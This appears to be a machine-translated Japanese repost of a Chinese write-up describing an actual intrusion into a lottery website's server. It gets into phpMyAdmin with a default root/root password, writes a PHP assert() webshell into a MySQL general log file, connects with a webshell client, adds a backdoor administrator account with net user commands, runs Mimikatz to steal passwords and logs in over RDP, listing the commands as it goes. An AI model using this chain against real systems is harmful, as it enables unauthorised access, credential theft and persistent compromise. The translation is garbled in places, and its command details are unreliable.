Jump to content

phpmyAdminの弱いパスワードを取得します

宝くじサイトのIPは情報を介してxxxであり、検出スキャンはphpmyadminが存在することを明らかにします。推測を通じて、デフォルトの弱いパスワード(root/root)を使用して、phpmyAdminにログインします。

图片

图片

PHPMyAdminバックグラウンドSQLクエリを介してファイルをログに記録するシェルを書き込む

phpmyAdminのSQLクエリ関数を使用して、ログファイルにTrojanを文章を書き込みます。

プロセスとコマンドは次のように:です

1。ログ機能をオンにします:Global general_log=onを設定します。

2。phpmyadmin変数をクリックして、ログファイル名:を表示します

图片

ここのログファイルはtest.phpです。

3。sqlコマンドを実行し、ログファイルに文を書きます: '?php assert($ _ post [' test ']);';

图片

4。実行が成功した後に戻ります。

图片

5.ログファイルを表示します。

图片

6.包丁を接続してユーザーを追加し、Mimikatzをアップロードします。

包皮ナイフを使用してログファイルに接続するトロイの木馬、xxx/test.phpパスワード:test

图片

システム管理者システムの許可であることを確認して確認します。ユーザーを追加して管理グループに追加してください。

コマンドは: C: \ windows \ system32 \ net.exeユーザーテストテスト!@#123 /addです

c: \ windows \ system32 \ net.exeローカルグループ管理者テスト /追加

Mimikatazをサーバーにアップロードします。

图片

7。3389接続と管理者のパスワードを読み取ります。

(1)直接的なTelnet IP 3389テストではアクセス可能であることがわかりました。そのため、3389を直接接続して入力しました。

图片

(2)または、次のコマンドがここの包丁で実行され、3389までにポートを開くとクエリをします。

ステップ1 :タスクリスト /SVC | findstr termerviceリモートデスクトップサービスのプロセスをクエリします

ステップ2 : Netstat -Ano | FindStr **** //リモートデスクトップサービスプロセス番号に対応するポート番号を確認します。

(3)Mimikatzを実行し、管理者グループのログインパスワードを読み取ります。

图片

(4)取得した管理者/xxxxアカウントパスワードを使用して、リモートでサーバーにログインします。

图片

サーバーは、phpMyStudyを使用してバッチに宝くじステーションを建設することがわかっていました。約12個のサイトがあり、いくつかのサーバー上のWebサイトドメイン名に自由にアクセスできます。一部のスクリーンショットは次のように:です

システム1 :

图片

システム2 :

图片

システム:

图片

舞台裏1 :

图片

舞台裏2 :

图片

元のリンクから転載: https://mp.weixin.qqq.com/s?__biz=mzg2ndywmda1na==mid=2247487003IDX=1SN=5C85B34CE6FFB400FDF858737E34DF3DCHK SM=CE67A482F9102D9405E838F34479DC8D1C6B793D3B6D4F40D9B3CEC9CC87F1455555555CB3DDCCENE=21#WECHAT_REDIRECT

https://blog.csdn.net/weixin_39997829/article/details/109186917

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...